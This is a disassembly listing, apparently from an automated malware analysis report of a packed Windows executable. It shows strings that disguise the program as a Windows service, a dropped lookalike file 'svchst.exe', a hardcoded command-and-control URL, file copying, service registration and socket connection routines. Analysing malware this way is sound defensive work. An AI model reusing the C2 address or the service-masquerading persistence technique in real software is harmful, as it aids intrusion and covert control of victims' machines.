00429DBB mov edx, 00429F38h ASCII "Host Generic Process"
00429DC0 call 00404430h
00429DC5 mov eax, 0042DAA0h
00429DCA mov edx, 00429F74h ASCII "Host Generic Process for Win32 Services"
00429DCF call 00404430h
00429DD4 mov eax, 0042DAA4h
00429DD9 mov edx, 00429FB0h ASCII "\svchst.exe"
00429DDE call 00404430h
00429DE3 mov eax, 0042DA88h
00429DE8 mov edx, 0042A000h ASCII "http://mahaajan.in/dd/diwar.php"
00429DED call 00404430h
00429DF2 lea edx, dword ptr [ebp-14h]
00429DF5 mov eax, dword ptr [0042DA9Ch] 009610D0
00429DFA call 00429BACh
00429DFF mov edx, dword ptr [ebp-14h]
00429E02 mov eax, 0042DA9Ch
00429E07 call 00404430h
00429E0C lea edx, dword ptr [ebp-18h]
00429E0F mov eax, dword ptr [0042DAA0h] 00961190
00429E14 call 00429BACh
00429E19 mov edx, dword ptr [ebp-18h]
00429E1C mov eax, 0042DAA0h
00429E21 call 00404430h
00429E26 lea edx, dword ptr [ebp-1Ch]
00429E29 mov eax, dword ptr [0042DAA4h] 00961D84
00429E2E call 00429BACh
00429E33 mov edx, dword ptr [ebp-1Ch]
00429E36 mov eax, 0042DAA4h
00429E3B call 00404430h
00429E40 mov eax, dword ptr [0042DA88h] 00961DD8
00429E45 call 00404878h
00429E4A mov edx, eax
00429E4C lea eax, dword ptr [ebp-24h]
00429E4F call 004045D4h
00429E54 mov eax, dword ptr [ebp-24h]
00429E57 lea edx, dword ptr [ebp-20h]
00429E5A call 00429BACh
00429E5F mov edx, dword ptr [ebp-20h]
00429E62 mov eax, 0042DA88h
00429E67 call 00404430h
00429E6C lea edx, dword ptr [ebp-28h]
00429E6F mov ax, 0024h
00429E73 call 00421CB8h
00429E78 mov edx, dword ptr [ebp-28h]
00429E7B mov eax, 0042DAA8h
00429E80 mov ecx, dword ptr [0042DAA4h] 00961D84
00429E86 call 004046C4h
00429E8B mov eax, dword ptr [0042DAA8h] 00961F30
00429E90 call 00407978h
00429E95 test al, al
00429E97 jne 00429EE4h
00429E99 push FFFFFFFFh
00429E9B mov eax, dword ptr [0042DAA8h] 00961F30
00429EA0 call 00404878h
00429EA5 mov ebx, eax
00429EA7 push ebx
00429EA8 lea edx, dword ptr [ebp-2Ch]
00429EAB xor eax, eax
00429EAD call 004029BCh
00429EB2 mov eax, dword ptr [ebp-2Ch]
00429EB5 call 00404878h
00429EBA push eax
00429EBB call 004060FCh CopyFileA@KERNEL32.DLL (Hidden Import)
00429EC0 mov eax, dword ptr [0042DA9Ch] 009610D0
00429EC5 call 00404878h
00429ECA push eax
00429ECB mov eax, ebx
00429ECD pop edx
00429ECE call 00429AB4h
00429ED3 mov eax, dword ptr [0042DA9Ch] 009610D0
00429ED8 call 00404878h
00429EDD call 00429B14h
00429EE2 jmp 00429F07h
00429EE4 mov eax, dword ptr [0042DA9Ch] 009610D0 xrefs 00429E97
00429EE9 call 00404878h
00429EEE mov dword ptr [0042CA98h], eax
00429EF3 mov dword ptr [0042CA9Ch], 00429A0Ch
00429EFD push 0042CA98h
00429F02 call 00421B7Ch StartServiceCtrlDispatcherA@ADVAPI32.DLL (Hidden Import)
00429F07 xor eax, eax xrefs 00429EE2
00429F09 pop edx
00429F0B pop ecx Count = 2
00429F0C mov dword ptr fs:[eax], edx
00429F0F push 00429F29h
00429F14 lea eax, dword ptr [ebp-2Ch] xrefs 00429F27
00429F17 mov edx, 00000007h
00429F1C call 00404400h
00429F21 ret function end
Function 00401520, API count: 1, instr count: 37
APIs
  • VirtualAlloc.KERNEL32, ref: 0040154F
Address Instruction Meta Information
00401520 push ebx xrefs 00401824
00401521 push esi
00401522 push edi
00401523 mov ebx, edx
00401525 mov esi, eax
00401527 cmp esi, 00100000h
0040152D jnl 00401536h
0040152F mov esi, 00100000h
00401534 jmp 00401542h
00401536 add esi, 0000FFFFh xrefs 0040152D
0040153C and esi, FFFF0000h
00401542 mov dword ptr [ebx+04h], esi xrefs 00401534
00401545 push 00000001h
00401547 push 00002000h
0040154C push esi
0040154D push 00000000h
0040154F call 0040134Ch VirtualAlloc@KERNEL32.DLL (Import)
00401554 mov edi, eax
00401556 mov dword ptr [ebx], edi
00401558 test edi, edi
0040155A je 0040157Fh
0040155C mov edx, ebx
0040155E mov eax, 0042C5E4h
00401563 call 004013D4h
00401568 test al, al
0040156A jne 0040157Fh
0040156C push 00008000h
00401571 push 00000000h
00401573 mov eax, dword ptr [ebx]
00401575 push eax
00401576 call 00401354h
0040157B xor eax, eax
0040157D mov dword ptr [ebx], eax
0040157F pop edi xrefs 0040155A, 0040156A
00401580 pop esi
00401581 pop ebx
00401582 ret function end
Function 0040A10C, API count: 1, instr count: 29
APIs
  • GetLocaleInfoA.KERNEL32, ref: 0040A12A
Address Instruction Meta Information
0040A10C push ebp xrefs 0040A19C, 0040A3BB, 0040A482, 0040B80A, 0040B82C, 0040B850, 0040B89A, 0040B8D1, 0040B8FE, 0040B93E, 0040B960, 0040B992, 0040B9D1, 0040B9F4
0040A10D mov ebp, esp
0040A10F add esp, FFFFFF00h
0040A115 push ebx
0040A116 push esi
0040A117 mov esi, ecx
0040A119 mov ebx, dword ptr [ebp+08h]
0040A11C push 00000100h
0040A121 lea ecx, dword ptr [ebp-00000100h]
0040A127 push ecx
0040A128 push edx
0040A129 push eax
0040A12A call 004061BCh GetLocaleInfoA@KERNEL32.DLL (Hidden Import)
0040A12F test eax, eax
0040A131 jle 0040A145h
0040A133 mov ecx, eax
0040A135 dec ecx
0040A136 lea edx, dword ptr [ebp-00000100h]
0040A13C mov eax, ebx
0040A13E call 004044CCh
0040A143 jmp 0040A14Eh
0040A145 mov eax, ebx xrefs 0040A131
0040A147 mov edx, esi
0040A149 call 00404430h
0040A14E pop esi xrefs 0040A143
0040A14F pop ebx
0040A150 mov esp, ebp
0040A152 pop ebp
0040A153 retn 0004h function end
Function 0040137C, API count: 0, instr count: 34
Address Instruction Meta Information
0040137C push ebx xrefs 004013DA
0040137D push esi
0040137E mov esi, 0042C5E0h
00401383 cmp dword ptr [esi], 00000000h
00401386 jne 004013C2h
00401388 push 00000644h
0040138D push 00000000h
0040138F call 0040133Ch
00401394 mov ecx, eax
00401396 test ecx, ecx
00401398 jne 0040139Fh
0040139A xor eax, eax
0040139C pop esi
0040139D pop ebx
0040139E ret function end
0040139F mov eax, dword ptr [0042C5DCh] 00148BC8 xrefs 00401398
004013A4 mov dword ptr [ecx], eax
004013A6 mov dword ptr [0042C5DCh], ecx
004013AC xor edx, edx
004013AE mov eax, edx xrefs 004013C0
004013B0 add eax, eax
004013B2 lea eax, dword ptr [ecx+eax*8+04h]
004013B6 mov ebx, dword ptr [esi]
004013B8 mov dword ptr [eax], ebx
004013BA mov dword ptr [esi], eax
004013BC inc edx
004013BD cmp edx, 64h
004013C0 jne 004013AEh
004013C2 mov eax, dword ptr [esi] xrefs 00401386
004013C4 mov edx, dword ptr [eax]
004013C6 mov dword ptr [esi], edx
004013C8 pop esi
004013C9 pop ebx
004013CA ret function end
Function 00421CB8, API count: 1, instr count: 41
APIs
  • SHGetSpecialFolderPathA.SHELL32, ref: 00421CEF
Address Instruction Meta Information
00421CB8 push ebp xrefs 00421E40, 00422267, 00422017, 00429E73
00421CB9 mov ebp, esp
00421CBB push 00000000h
00421CBD push ebx
00421CBE push esi
00421CBF mov esi, edx
00421CC1 mov ebx, eax
00421CC3 xor eax, eax
00421CC5 push ebp
00421CC6 push 00421D27h
00421CCB push dword ptr fs:[eax]
00421CCE mov dword ptr fs:[eax], esp
00421CD1 lea eax, dword ptr [ebp-04h]
00421CD4 mov edx, 00000104h
00421CD9 call 004049A8h
00421CDE push 00000001h
00421CE0 movzx eax, bx
00421CE3 push eax
00421CE4 mov eax, dword ptr [ebp-04h]
00421CE7 call 00404878h
00421CEC push eax
00421CED push 00000000h
00421CEF call 00421B94h SHGetSpecialFolderPathA@SHELL32.DLL (Import)
00421CF4 test al, al
00421CF6 jne 00421D00h
00421CF8 lea eax, dword ptr [ebp-04h]
00421CFB call 004043DCh
00421D00 mov eax, dword ptr [ebp-04h] xrefs 00421CF6
00421D03 call 00404878h
00421D08 mov edx, eax
00421D0A mov eax, esi
00421D0C call 004045D4h
00421D11 xor eax, eax
00421D13 pop edx
00421D15 pop ecx Count = 2
00421D16 mov dword ptr fs:[eax], edx
00421D19 push 00421D2Eh
00421D1E lea eax, dword ptr [ebp-04h] xrefs 00421D2C
00421D21 call 004043DCh
00421D26 ret function end
Function 00407910, API count: 4, instr count: 37
APIs
  • FindFirstFileA.KERNEL32, ref: 0040792B
  • FindClose.KERNEL32, ref: 00407936
  • FileTimeToLocalFileTime.KERNEL32, ref: 0040794F
  • FileTimeToDosDateTime.KERNEL32, ref: 00407960
Address Instruction Meta Information
00407910 push ebp xrefs 0040797D
00407911 mov ebp, esp
00407913 add esp, FFFFFEB4h
00407919 push ebx
0040791A mov ebx, eax
0040791C lea eax, dword ptr [ebp-0000014Ch]
00407922 push eax
00407923 mov eax, ebx
00407925 call 00404878h
0040792A push eax
0040792B call 00406144h FindFirstFileA@KERNEL32.DLL (Hidden Import)
00407930 cmp eax, FFFFFFFFh
00407933 je 00407969h
00407935 push eax
00407936 call 0040613Ch FindClose@KERNEL32.DLL (Hidden Import)
0040793B test byte ptr [ebp-0000014Ch], 00000010h
00407942 jne 00407969h
00407944 lea eax, dword ptr [ebp-0Ch]
00407947 push eax
00407948 lea eax, dword ptr [ebp-00000138h]
0040794E push eax
0040794F call 00406134h FileTimeToLocalFileTime@KERNEL32.DLL (Hidden Import)
00407954 lea eax, dword ptr [ebp-04h]
00407957 push eax
00407958 lea eax, dword ptr [ebp-02h]
0040795B push eax
0040795C lea eax, dword ptr [ebp-0Ch]
0040795F push eax
00407960 call 0040612Ch FileTimeToDosDateTime@KERNEL32.DLL (Hidden Import)
00407965 test eax, eax
00407967 jne 00407970h
00407969 mov dword ptr [ebp-04h], FFFFFFFFh xrefs 00407933, 00407942
00407970 mov eax, dword ptr [ebp-04h] xrefs 00407967
00407973 pop ebx
00407974 mov esp, ebp
00407976 pop ebp
00407977 ret function end
Function 00413778, API count: 1, instr count: 3
APIs
  • Sleep.KERNEL32, ref: 00413779
Address Instruction Meta Information
00413778 push eax xrefs 00418672, 00418696, 004196E8, 00418D63
00413779 call 0040628Ch Sleep@KERNEL32.DLL (Hidden Import)
0041377E ret function end
Function 004062E4, API count: 0, instr count: 6
Address Instruction Meta Information
004062E4 push edx xrefs 00412553
004062E5 push eax
004062E6 call 00406204h
004062EB push eax
004062EC call 00406214h
004062F1 ret function end
Function 004139F4, API count: 1, instr count: 13
APIs
  • connect.WS2_32, ref: 00413A04
Address Instruction Meta Information
004139F4 push ebx xrefs 00418520
004139F5 push esi
004139F6 mov ebx, edx
004139F8 mov esi, eax
004139FA mov eax, ebx
004139FC call 0041399Ch
00413A01 push eax
00413A02 push ebx
00413A03 push esi
00413A04 call dword ptr [0042B434h] connect@WS2_32.DLL (Hidden Import)
00413A0A pop esi
00413A0B pop ebx
00413A0C ret function end
Function 0040A158, API count: 0, instr count: 23
Address Instruction Meta Information
0040A158 push ebx xrefs 0040B86D, 0040B880, 0040B8B7, 0040B924, 0040BA66
0040A159 push esi
0040A15A push edi
0040A15B push ecx
0040A15C mov ebx, ecx
0040A15E mov esi, edx
0040A160 mov edi, eax
0040A162 push 00000002h
0040A164 lea eax, dword ptr [esp+04h]
0040A168 push eax
0040A169 push esi
0040A16A push edi
0040A16B call 004061BCh
0040A170 test eax, eax
0040A172 jle 0040A179h
0040A174 mov al, byte ptr [esp]
0040A177 jmp 0040A17Bh
0040A179 mov eax, ebx xrefs 0040A172
0040A17B pop edx xrefs 0040A177
0040A17C pop edi
0040A17D pop esi
0040A17E pop ebx
0040A17F ret function end
Function 00404390, API count: 1, instr count: 29
APIs
  • CreateThread.KERNEL32, ref: 004043C6
Address Instruction Meta Information
00404390 push ebp xrefs 004131D6
00404391 mov ebp, esp
00404393 push ebx
00404394 push esi
00404395 push edi
00404396 mov edi, ecx
00404398 mov esi, edx
0040439A mov ebx, eax
0040439C mov eax, 00000008h
004043A1 call 004026C8h
004043A6 mov dword ptr [eax], edi
004043A8 mov edx, dword ptr [ebp+10h]
004043AB mov dword ptr [eax+04h], edx
004043AE mov byte ptr [0042C045h], 00000001h
004043B5 mov edx, dword ptr [ebp+08h]
004043B8 push edx
004043B9 mov edx, dword ptr [ebp+0Ch]
004043BC push edx
004043BD push eax
004043BE mov eax, 00404358h
004043C3 push eax
004043C4 push esi
004043C5 push ebx
004043C6 call 00401208h CreateThread@KERNEL32.DLL (Hidden Import)
004043CB pop edi
004043CC pop esi
004043CD pop ebx
004043CE pop ebp
004043CF retn 000Ch function end
Function 00402DA8, API count: 2, instr count: 60
APIs
  • WriteFile.KERNEL32, ref: 00402DD2
  • RtlGetLastWin32Error.NTDLL, ref: 00402DD9
Address Instruction Meta Information
00402DA8 push ebp xrefs 00402E48, 00402E68
00402DA9 mov ebp, esp
00402DAB push ecx
00402DAC push ebx
00402DAD push esi
00402DAE push edi
00402DAF mov esi, ecx
00402DB1 mov edi, edx
00402DB3 mov ebx, eax
00402DB5 mov eax, dword ptr [ebp+10h]
00402DB8 movzx edx, word ptr [ebx+04h]
00402DBC and edx, eax
00402DBE cmp eax, edx
00402DC0 jne 00402E1Ah
00402DC2 push 00000000h
00402DC4 lea eax, dword ptr [ebp-04h]
00402DC7 push eax
00402DC8 mov eax, dword ptr [ebx+08h]
00402DCB imul esi
00402DCD push eax
00402DCE push edi
00402DCF mov eax, dword ptr [ebx]
00402DD1 push eax
00402DD2 call dword ptr [ebp+0Ch] WriteFile@KERNEL32.DLL (Hidden Import)
00402DD5 test eax, eax
00402DD7 jne 00402DEAh
00402DD9 call 00401248h RtlGetLastWin32Error@NTDLL.DLL (Hidden Import)
00402DDE call 00402810h
00402DE3 xor eax, eax
00402DE5 mov dword ptr [ebp-04h], eax
00402DE8 jmp 00402E29h
00402DEA mov eax, dword ptr [ebp-04h] xrefs 00402DD7
00402DED xor edx, edx
00402DEF div dword ptr [ebx+08h]
00402DF2 mov dword ptr [ebp-04h], eax
00402DF5 mov eax, dword ptr [ebp+14h]
00402DF8 test eax, eax
00402DFA je 00402E06h
00402DFC mov eax, dword ptr [ebp+14h]
00402DFF mov edx, dword ptr [ebp-04h]
00402E02 mov dword ptr [eax], edx
00402E04 jmp 00402E29h
00402E06 cmp esi, dword ptr [ebp-04h] xrefs 00402DFA
00402E09 je 00402E29h
00402E0B mov eax, dword ptr [ebp+08h]
00402E0E call 00402810h
00402E13 xor eax, eax
00402E15 mov dword ptr [ebp-04h], eax
00402E18 jmp 00402E29h
00402E1A mov eax, 00000067h xrefs 00402DC0
00402E1F call 00402810h
00402E24 xor eax, eax
00402E26 mov dword ptr [ebp-04h], eax
00402E29 mov eax, dword ptr [ebp-04h] xrefs 00402E09, 00402E18, 00402E04, 00402DE8
00402E2C pop edi
00402E2D pop esi
00402E2E pop ebx
00402E2F pop ecx
00402E30 pop ebp
00402E31 retn 0010h function end
Function 00437BB0, API count: 5, instr count: 164
APIs
  • LoadLibraryA.KERNEL32, ref: 00437CDA
  • GetProcAddress.KERNEL32, ref: 00437CEF
  • ExitProcess.KERNEL32, ref: 00437D00
  • VirtualProtect.KERNEL32, ref: 00437D1D
  • VirtualProtect.KERNEL32, ref: 00437D32
Strings
  • ble; MSIE 6.0; Windows NT 5.1; StumbleUpon.com 1.760; .NET CLR 1.1.4322) , va: 00426000
Address Instruction Meta Information
00437BB0 pushad
00437BB1 mov esi, 00426000h ASCII "ble; MSIE 6.0; Windows NT 5.1; StumbleUpon.com 1.760; .NET CLR 1.1.4322) "
00437BB6 lea edi, dword ptr [esi-00025000h]
00437BBC mov dword ptr [edi+0002A0C4h], 7D9D6338h
00437BC6 push edi
00437BC7 or ebp, FFFFFFFFh
00437BCA jmp 00437BDAh
00437BD0 mov al, byte ptr [esi] xrefs 00437BE1
00437BD2 inc esi
00437BD3 mov byte ptr [edi], al
00437BD5 inc edi
00437BD6 add ebx, ebx xrefs 00437C85, 00437C6E
00437BD8 jne 00437BE1h
00437BDA mov ebx, dword ptr [esi] xrefs 00437BCA
00437BDC sub esi, FFFFFFFCh
00437BDF adc ebx, ebx
00437BE1 jc 00437BD0h xrefs 00437BD8
00437BE3 mov eax, 00000001h
00437BE8 add ebx, ebx xrefs 00437BF7, 00437C02
00437BEA jne 00437BF3h
00437BEC mov ebx, dword ptr [esi]
00437BEE sub esi, FFFFFFFCh
00437BF1 adc ebx, ebx
00437BF3 adc eax, eax xrefs 00437BEA
00437BF5 add ebx, ebx
00437BF7 jnc 00437BE8h
00437BF9 jne 00437C04h
00437BFB mov ebx, dword ptr [esi]
00437BFD sub esi, FFFFFFFCh
00437C00 adc ebx, ebx
00437C02 jnc 00437BE8h
00437C04 xor ecx, ecx xrefs 00437BF9
00437C06 sub eax, 03h
00437C09 jc 00437C18h
00437C0B shl eax, 08h
00437C0E mov al, byte ptr [esi]
00437C10 inc esi
00437C11 xor eax, FFFFFFFFh
00437C14 je 00437C8Ah
00437C16 mov ebp, eax
00437C18 add ebx, ebx xrefs 00437C09
00437C1A jne 00437C23h
00437C1C mov ebx, dword ptr [esi]
00437C1E sub esi, FFFFFFFCh
00437C21 adc ebx, ebx
00437C23 adc ecx, ecx xrefs 00437C1A
00437C25 add ebx, ebx
00437C27 jne 00437C30h
00437C29 mov ebx, dword ptr [esi]
00437C2B sub esi, FFFFFFFCh
00437C2E adc ebx, ebx
00437C30 adc ecx, ecx xrefs 00437C27
00437C32 jne 00437C54h
00437C34 inc ecx
00437C35 add ebx, ebx xrefs 00437C44, 00437C4F
00437C37 jne 00437C40h
00437C39 mov ebx, dword ptr [esi]
00437C3B sub esi, FFFFFFFCh
00437C3E adc ebx, ebx
00437C40 adc ecx, ecx xrefs 00437C37
00437C42 add ebx, ebx
00437C44 jnc 00437C35h
00437C46 jne 00437C51h
00437C48 mov ebx, dword ptr [esi]
00437C4A sub esi, FFFFFFFCh
00437C4D adc ebx, ebx
00437C4F jnc 00437C35h
00437C51 add ecx, 02h xrefs 00437C46
00437C54 cmp ebp, FFFFF300h xrefs 00437C32
00437C5A adc ecx, 01h
00437C5D lea edx, dword ptr [edi+ebp]
00437C60 cmp ebp, FFFFFFFCh
00437C63 jbe 00437C74h
00437C65 mov al, byte ptr [edx] xrefs 00437C6C
00437C67 inc edx
00437C68 mov byte ptr [edi], al
00437C6A inc edi
00437C6B dec ecx
00437C6C jne 00437C65h
00437C6E jmp 00437BD6h
00437C74 mov eax, dword ptr [edx] xrefs 00437C63, 00437C81
00437C76 add edx, 04h
00437C79 mov dword ptr [edi], eax
00437C7B add edi, 04h
00437C7E sub ecx, 04h
00437C81 jnbe 00437C74h
00437C83 add edi, ecx
00437C85 jmp 00437BD6h
00437C8A pop esi xrefs 00437C14
00437C8B mov edi, esi
00437C8D mov ecx, 000014D0h
00437C92 mov al, byte ptr [edi] xrefs 00437C99, 00437C9E
00437C94 inc edi
00437C95 sub al, E8h
00437C97 cmp al, 01h xrefs 00437CBC
00437C99 jnbe 00437C92h
00437C9B cmp byte ptr [edi], 00000011h
00437C9E jne 00437C92h
00437CA0 mov eax, dword ptr [edi]
00437CA2 mov bl, byte ptr [edi+04h]
00437CA5 shr ax, 0008h
00437CA9 rol eax, 10h
00437CAC xchg ah, al
00437CAE sub eax, edi
00437CB0 sub bl, FFFFFFE8h
00437CB3 add eax, esi
00437CB5 mov dword ptr [edi], eax
00437CB7 add edi, 05h
00437CBA mov al, bl
00437CBC loop 00437C97h
00437CBE lea edi, dword ptr [esi+00035000h]
00437CC4 mov eax, dword ptr [edi] xrefs 00437CE6
00437CC6 or eax, eax
00437CC8 je 00437D06h
00437CCA mov ebx, dword ptr [edi+04h]
00437CCD lea eax, dword ptr [eax+esi+00037218h]
00437CD4 add ebx, esi
00437CD6 push eax
00437CD7 add edi, 08h
00437CDA call dword ptr [esi+00037290h] LoadLibraryA@KERNEL32.DLL (Import)
00437CE0 xchg eax, ebp
00437CE1 mov al, byte ptr [edi] xrefs 00437CFE
00437CE3 inc edi
00437CE4 or al, al
00437CE6 je 00437CC4h
00437CE8 mov ecx, edi
00437CEA push edi
00437CEB dec eax
00437CEC repne scasb
00437CEE push ebp
00437CEF call dword ptr [esi+00037294h] GetProcAddress@KERNEL32.DLL (Import)
00437CF5 or eax, eax
00437CF7 je 00437D00h
00437CF9 mov dword ptr [ebx], eax
00437CFB add ebx, 04h
00437CFE jmp 00437CE1h
00437D00 call dword ptr [esi+000372A4h] ExitProcess@KERNEL32.DLL (Import) xrefs 00437CF7
00437D06 mov ebp, dword ptr [esi+00037298h] VirtualProtect@KERNEL32.DLL (Import) xrefs 00437CC8
00437D0C lea edi, dword ptr [esi-00001000h]
00437D12 mov ebx, 00001000h
00437D17 push eax
00437D18 push esp
00437D19 push 00000004h
00437D1B push ebx
00437D1C push edi
00437D1D call ebp VirtualProtect@KERNEL32.DLL (Import)
00437D1F lea eax, dword ptr [edi+0000021Fh]
00437D25 and byte ptr [eax], 0000007Fh
00437D28 and byte ptr [eax+28h], 0000007Fh
00437D2C pop eax
00437D2D push eax
00437D2E push esp
00437D2F push eax
00437D30 push ebx
00437D31 push edi
00437D32 call ebp VirtualProtect@KERNEL32.DLL (Import)
00437D34 pop eax
00437D35 popad
00437D36 lea eax, dword ptr [esp-80h]
00437D3A push 00000000h xrefs 00437D3E
00437D3C cmp esp, eax
00437D3E jne 00437D3Ah
00437D40 sub esp, FFFFFF80h
00437D43 jmp 00429D88h swap point
Function 00413F58, API count: 2, instr count: 74
APIs
  • inet_ntoa.WS2_32, ref: 00413F9C
  • getnameinfo.WS2_32, ref: 00413FF4
Address Instruction Meta Information
00413F58 push ebp xrefs 004181AA
00413F59 mov ebp, esp
00413F5B add esp, FFFFFFDCh
00413F5E push ebx
00413F5F push esi
00413F60 push edi
00413F61 xor ecx, ecx
00413F63 mov dword ptr [ebp-04h], ecx
00413F66 mov dword ptr [ebp-08h], ecx
00413F69 mov esi, eax
00413F6B lea edi, dword ptr [ebp-24h]
00413F6E mov ecx, 00000007h
00413F73 rep movsd
00413F75 mov edi, edx
00413F77 xor eax, eax
00413F79 push ebp
00413F7A push 0041402Ah
00413F7F push dword ptr fs:[eax]
00413F82 mov dword ptr fs:[eax], esp
00413F85 mov eax, edi
00413F87 call 004043DCh
00413F8C movzx eax, word ptr [ebp-24h]
00413F90 call 00413B74h
00413F95 test al, al
00413F97 jne 00413FB3h
00413F99 push dword ptr [ebp-20h]
00413F9C call dword ptr [0042B41Ch] inet_ntoa@WS2_32.DLL (Hidden Import)
00413FA2 mov ebx, eax
00413FA4 test ebx, ebx
00413FA6 je 0041400Fh
00413FA8 mov eax, edi
00413FAA mov edx, ebx
00413FAC call 004045D4h
00413FB1 jmp 0041400Fh
00413FB3 mov ebx, 00000401h xrefs 00413F97
00413FB8 mov esi, 00000020h
00413FBD lea eax, dword ptr [ebp-04h]
00413FC0 mov edx, ebx
00413FC2 call 004049A8h
00413FC7 lea eax, dword ptr [ebp-08h]
00413FCA mov edx, esi
00413FCC call 004049A8h
00413FD1 push 0000000Ah
00413FD3 push esi
00413FD4 mov eax, dword ptr [ebp-08h]
00413FD7 call 00404878h
00413FDC push eax
00413FDD push ebx
00413FDE mov eax, dword ptr [ebp-04h]
00413FE1 call 00404878h
00413FE6 push eax
00413FE7 lea eax, dword ptr [ebp-24h]
00413FEA call 0041399Ch
00413FEF push eax
00413FF0 lea eax, dword ptr [ebp-24h]
00413FF3 push eax
00413FF4 call dword ptr [0042B454h] getnameinfo@WS2_32.DLL (Hidden Import)
00413FFA test eax, eax
00413FFC jne 0041400Fh
00413FFE mov eax, dword ptr [ebp-04h]
00414001 call 00404878h
00414006 mov edx, eax
00414008 mov eax, edi
0041400A call 004045D4h
0041400F xor eax, eax xrefs 00413FFC, 00413FA6, 00413FB1
00414011 pop edx
00414013 pop ecx Count = 2
00414014 mov dword ptr fs:[eax], edx
00414017 push 00414031h
0041401C lea eax, dword ptr [ebp-08h] xrefs 0041402F
0041401F mov edx, 00000002h
00414024 call 00404400h
00414029 ret function end
Function 004181D8, API count: 1, instr count: 72
APIs
  • socket.WS2_32, ref: 00418257
Strings
  • IPv6, va: 004182DC
Address Instruction Meta Information
004181D8 push ebx xrefs 00418401, 00418512
004181D9 push esi
004181DA push edi
004181DB add esp, FFFFFFE4h
004181DE mov esi, edx
004181E0 lea edi, dword ptr [esp]
004181E3 mov ecx, 00000007h
004181E8 rep movsd
004181EA mov ebx, eax
004181EC mov byte ptr [ebx+000001A8h], 00000000h
004181F3 xor eax, eax
004181F5 mov dword ptr [ebx+0000019Ch], eax
004181FB xor eax, eax
004181FD mov dword ptr [ebx+000001A0h], eax
00418203 mov eax, ebx
00418205 call 0041949Ch
0041820A cmp dword ptr [ebx+000001B4h], FFFFFFFFh
00418211 jne 004182CBh
00418217 lea eax, dword ptr [ebx+6Ch]
0041821A call 004043DCh
0041821F mov byte ptr [ebx+0000008Bh], 00000000h
00418226 cmp word ptr [esp], 0017h
0041822B sete al
0041822E mov byte ptr [ebx+0000008Eh], al
00418234 mov eax, ebx
00418236 mov edx, dword ptr [eax]
00418238 call dword ptr [edx+000000A4h]
0041823E push eax
0041823F mov eax, ebx
00418241 mov edx, dword ptr [eax]
00418243 call dword ptr [edx+000000A0h]
00418249 push eax
0041824A movzx eax, word ptr [esp+08h]
0041824F push eax
00418250 mov eax, dword ptr [0042B7C4h] 0042B444
00418255 mov eax, dword ptr [eax]
00418257 call eax socket@WS2_32.DLL (Hidden Import)
00418259 mov esi, eax
0041825B mov dword ptr [ebx+000001B4h], esi
00418261 inc esi
00418262 jne 00418273h
00418264 mov eax, dword ptr [0042B930h] 0042B3D0
00418269 mov eax, dword ptr [eax]
0041826B call eax
0041826D mov dword ptr [ebx+000001B8h], eax
00418273 lea eax, dword ptr [ebx+00000095h] xrefs 00418262
00418279 call 00413994h
0041827E lea edx, dword ptr [ebx+00000095h]
00418284 mov eax, dword ptr [ebx+000001B4h]
0041828A call 00413984h
0041828F mov eax, ebx
00418291 call 0041952Ch
00418296 cmp byte ptr [ebx+0000008Eh], 00000000h
0041829D je 004182AFh
0041829F mov ecx, 004182DCh ASCII "IPv6"
004182A4 mov dl, 02h
004182A6 mov eax, ebx
004182A8 call 00419E70h
004182AD jmp 004182BDh
004182AF mov ecx, 004182ECh xrefs 0041829D
004182B4 mov dl, 02h
004182B6 mov eax, ebx
004182B8 call 00419E70h
004182BD mov eax, ebx xrefs 004182AD
004182BF call 00417FFCh
004182C4 mov eax, ebx
004182C6 call 00419F28h
004182CB add esp, 1Ch xrefs 00418211
004182CE pop edi
004182CF pop esi
004182D0 pop ebx
004182D1 ret function end
Function 004134EC, API count: 1, instr count: 17
APIs
  • ResumeThread.KERNEL32, ref: 004134F4
Address Instruction Meta Information
004134EC push ebx xrefs 00422544, 0041327A, 004132C2
004134ED push esi
004134EE mov ebx, eax
004134F0 mov eax, dword ptr [ebx+04h]
004134F3 push eax
004134F4 call 0040626Ch ResumeThread@KERNEL32.DLL (Hidden Import)
004134F9 mov esi, eax
004134FB test esi, esi
004134FD setnl dl
00413500 mov eax, ebx
00413502 call 00413344h
00413507 dec esi
00413508 jne 0041350Eh
0041350A mov byte ptr [ebx+0Eh], 00000000h
0041350E pop esi xrefs 00413508
0041350F pop ebx
00413510 ret function end
Function 004291FC, API count: 1, instr count: 396
APIs
    • QueryPerformanceCounter.KERNEL32, ref: 00402A20
    • GetTickCount.KERNEL32, ref: 00402A34
  • Sleep.KERNEL32, ref: 0042975A
Address Instruction Meta Information
004291FC push ebp
004291FD mov ebp, esp
004291FF mov ecx, 0000000Eh
00429206 push 00000000h Count = 2
00429208 dec ecx
00429209 jne 00429204h
0042920B push ecx
0042920C push ebx
0042920D push esi
0042920E push edi
0042920F xor edx, edx
00429211 push ebp
00429212 push 00429798h
00429217 push dword ptr fs:[edx]
0042921A mov dword ptr fs:[edx], esp
0042921D mov byte ptr [eax+0Fh], 00000001h
00429221 mov dl, 01h
00429223 mov eax, dword ptr [0040FD08h] 0040FD54
00429228 call 004036D8h
0042922D mov dword ptr [0042DA80h], eax
00429232 mov dword ptr [ebp-0Ch], 000000B4h
00429239 mov eax, dword ptr [ebp-0Ch]
0042923C mov dword ptr [ebp-08h], eax
0042923F xor eax, eax
00429241 mov dword ptr [0042DA6Ch], eax
00429246 xor eax, eax
00429248 mov dword ptr [0042DA90h], eax
0042924D xor eax, eax
0042924F mov dword ptr [0042DA94h], eax
00429254 xor eax, eax
00429256 mov dword ptr [0042DA98h], eax
0042925B call 00402A1Ch
00429260 xor eax, eax xrefs 0042975F
00429262 push ebp
00429263 push 00429748h
00429268 push dword ptr fs:[eax]
0042926B mov dword ptr fs:[eax], esp
0042926E mov dl, 01h
00429270 mov eax, dword ptr [0040FD08h] 0040FD54
00429275 call 004036D8h
0042927A mov dword ptr [ebp-04h], eax
0042927D lea edx, dword ptr [ebp-1Ch]
00429280 mov eax, dword ptr [0042DA88h] 00961DD8
00429285 call 00429030h
0042928A mov edx, dword ptr [ebp-1Ch]
0042928D mov eax, dword ptr [ebp-04h]
00429290 mov ecx, dword ptr [eax]
00429292 call dword ptr [ecx+2Ch]
00429295 lea edx, dword ptr [ebp-20h]
00429298 mov eax, dword ptr [ebp-04h]
0042929B mov ecx, dword ptr [eax]
0042929D call dword ptr [ecx+1Ch]
004292A0 mov edx, dword ptr [ebp-20h]
004292A3 mov eax, 004297B0h
004292A8 call 00404960h
004292AD cmp eax, 03h
004292B0 jne 00429724h
004292B6 xor eax, eax
004292B8 push ebp
004292B9 push 004292F9h
004292BE push dword ptr fs:[eax]
